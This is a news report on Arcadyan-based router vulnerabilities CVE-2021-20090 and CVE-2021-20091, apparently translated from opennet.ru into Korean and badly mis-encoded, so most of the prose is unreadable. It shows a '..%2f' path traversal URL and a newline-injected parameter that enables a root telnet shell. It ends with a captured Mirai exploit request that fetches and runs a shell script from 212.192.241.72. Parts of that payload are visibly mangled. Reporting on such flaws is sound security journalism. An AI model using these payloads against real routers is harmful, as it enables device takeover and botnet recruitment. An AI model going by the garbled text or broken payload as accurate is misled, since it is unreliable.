Arcadyan ํ์ฌ์ HTTP ์๋ฒ ๊ตฌํ์ ์ฌ์ฉํ๋ ํ์จ์ด๋ฅผ ์ฌ์ฉํ๋ ํ ๋ผ์ฐํฐ์ ๋ํ ๋๊ท๋ชจ ๊ณต๊ฒฉ์ด ๋คํธ์ํฌ์ ๊ธฐ๋ก๋์์ต๋๋ค. ์ฅ์น์ ๋ํ ์ ์ด๊ถ์ ์ป๊ธฐ ์ํด ๋ฃจํธ ๊ถํ์ผ๋ก ์์ ์ฝ๋์ ์๊ฒฉ ์คํ์ ํ์ฉํ๋ ๋ ๊ฐ์ง ์ทจ์ฝ์ ์ ์กฐํฉ์ด ์ฌ์ฉ๋ฉ๋๋ค. ์ด ๋ฌธ์ ๋ Arcadyan, ASUS ๋ฐ Buffalo์ ์๋นํ ๊ด๋ฒ์ํ ADSL ๋ผ์ฐํฐ๋ฟ๋ง ์๋๋ผ Beeline ๋ธ๋๋(Smart Box Flash์์ ๋ฌธ์ ๊ฐ ํ์ธ๋จ), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone ๋ฐ ๋ค๋ฅธ ํต์ ์ฌ์ ์. ์ด ๋ฌธ์ ๋ Arcadyan ํ์จ์ด์ 10๋ ์ด์ ์กด์ฌํด ์์ผ๋ฉฐ ์ด ๊ธฐ๊ฐ ๋์ 20๊ฐ ์ ์กฐ์ ์ฒด์ ์ต์ 17๊ฐ ์ฅ์น ๋ชจ๋ธ๋ก ๋ง์ด๊ทธ๋ ์ด์ ๋์์ต๋๋ค.
์ฒซ ๋ฒ์งธ ์ทจ์ฝ์ ์ธ CVE-2021-20090์ ์ธ์ฆ ์์ด ๋ชจ๋ ์น ์ธํฐํ์ด์ค ์คํฌ๋ฆฝํธ์ ์ก์ธ์คํ ์ ์๊ฒ ํด์ค๋๋ค. ์ทจ์ฝ์ ์ ๋ณธ์ง์ ์น ์ธํฐํ์ด์ค์์ ์ด๋ฏธ์ง, CSS ํ์ผ ๋ฐ JavaScript ์คํฌ๋ฆฝํธ๊ฐ ์ ์ก๋๋ ์ผ๋ถ ๋๋ ํฐ๋ฆฌ์ ์ธ์ฆ ์์ด ์ก์ธ์คํ ์ ์๋ค๋ ๊ฒ์ ๋๋ค. ์ด ๊ฒฝ์ฐ, ์ธ์ฆ ์์ด ์ ๊ทผ์ด ํ์ฉ๋ ๋๋ ํฐ๋ฆฌ๋ ์ด๊ธฐ ๋ง์คํฌ๋ฅผ ํตํด ๊ฒ์ฌ๋ฉ๋๋ค. ์์ ๋๋ ํฐ๋ฆฌ๋ก ์ด๋ํ๋ ๊ฒฝ๋ก์ "../" ๋ฌธ์๋ฅผ ์ง์ ํ๋ ๊ฒ์ ํ์จ์ด์ ์ํด ์ฐจ๋จ๋์ง๋ง "..%2f" ์กฐํฉ ์ฌ์ฉ์ ๊ฑด๋๋๋๋ค. ๋ฐ๋ผ์ "http://192.168.1.1/images/..%2findex.htm"๊ณผ ๊ฐ์ ์์ฒญ์ ๋ณด๋ผ ๋ ๋ณดํธ๋ ํ์ด์ง๋ฅผ ์ด ์ ์์ต๋๋ค.
๋ ๋ฒ์งธ ์ทจ์ฝ์ ์ธ CVE-2021-20091์ ์ธ์ฆ๋ ์ฌ์ฉ์๊ฐ ํน๋ณํ ํ์ํ๋ ๋งค๊ฐ๋ณ์๋ฅผ apply_abstract.cgi ์คํฌ๋ฆฝํธ์ ์ ์กํ์ฌ ์ฅ์น์ ์์คํ ์ค์ ์ ๋ณ๊ฒฝํ ์ ์๋๋ก ํ์ฉํฉ๋๋ค. ์ด ์คํฌ๋ฆฝํธ๋ ๋งค๊ฐ๋ณ์์ ๊ฐํ ๋ฌธ์๊ฐ ์๋์ง ํ์ธํ์ง ์์ต๋๋ค. . ์๋ฅผ ๋ค์ด, ๊ณต๊ฒฉ์๋ ping ์์ ์ ์ํํ ๋ /tmp/etc/config/ ์ค์ ํ์ผ ์์ฑ ์ ํ์ธ ์ค์ธ IP ์ฃผ์์ ์คํฌ๋ฆฝํธ๊ฐ ํฌํจ๋ ํ๋์ โ192.168.1.2%0AARC_SYS_TelnetdEnable=1โ ๊ฐ์ ์ง์ ํ ์ ์์ต๋๋ค. .glbcfg๋ ๋ฃจํธ ๊ถํ์ผ๋ก ๋ฌด์ ํ ๋ช ๋ น ์ ธ ์ก์ธ์ค๋ฅผ ์ ๊ณตํ๋ telnetd ์๋ฒ๋ฅผ ํ์ฑํํ๋ "AARC_SYS_TelnetdEnable=1" ํ์ "์ ์์ฑํฉ๋๋ค. ๋ง์ฐฌ๊ฐ์ง๋ก AARC_SYS ๋งค๊ฐ๋ณ์๋ฅผ ์ค์ ํ๋ฉด ์์คํ ์์ ๋ชจ๋ ์ฝ๋๋ฅผ ์คํํ ์ ์์ต๋๋ค. ์ฒซ ๋ฒ์งธ ์ทจ์ฝ์ ์ โ/images/..%2fapply_abstract.cgiโ๋ก ์ ๊ทผํ์ฌ ์ธ์ฆ ์์ด ๋ฌธ์ ๊ฐ ์๋ ์คํฌ๋ฆฝํธ๋ฅผ ์คํํ ์ ์๊ฒ ํด์ค๋๋ค.
์ทจ์ฝ์ ์ ์
์ฉํ๋ ค๋ฉด ๊ณต๊ฒฉ์๊ฐ ์น ์ธํฐํ์ด์ค๊ฐ ์คํ ์ค์ธ ๋คํธ์ํฌ ํฌํธ์ ์์ฒญ์ ๋ณด๋ผ ์ ์์ด์ผ ํฉ๋๋ค. ๊ณต๊ฒฉ ํ์ฐ์ ์ญํ์ผ๋ก ํ๋จํ ๋ ๋ง์ ์ด์์๋ ์ง์ ์๋น์ค์ ๋ฌธ์ ์ง๋จ์ ๋จ์ํํ๊ธฐ ์ํด ์ธ๋ถ ๋คํธ์ํฌ์์ ์ฅ์น์ ๋ํ ์ก์ธ์ค ๊ถํ์ ๋จ๊ฒจ ๋ก๋๋ค. ์ธํฐํ์ด์ค์ ๋ํ ์ ๊ทผ์ด ๋ด๋ถ๋ง์ผ๋ก๋ง ์ ํ๋์ด ์๋ ๊ฒฝ์ฐ์๋ 'DNS ๋ฆฌ๋ฐ์ธ๋ฉ' ๊ธฐ๋ฒ์ ์ด์ฉํด ์ธ๋ถ๋ง์์๋ ๊ณต๊ฒฉ์ด ๊ฐ๋ฅํ๋ค. ๋ผ์ฐํฐ๋ฅผ Mirai ๋ด๋ท์ ์ฐ๊ฒฐํ๋ ๋ฐ ์ด๋ฏธ ์ทจ์ฝ์ ์ด ํ๋ฐํ๊ฒ ์ฌ์ฉ๋๊ณ ์์ต๋๋ค: POST /images/..%2fapply_abstract.cgi HTTP/1.1 ์ฐ๊ฒฐ: close User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; ์ปฌ+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
์ถ์ฒ : opennet.ru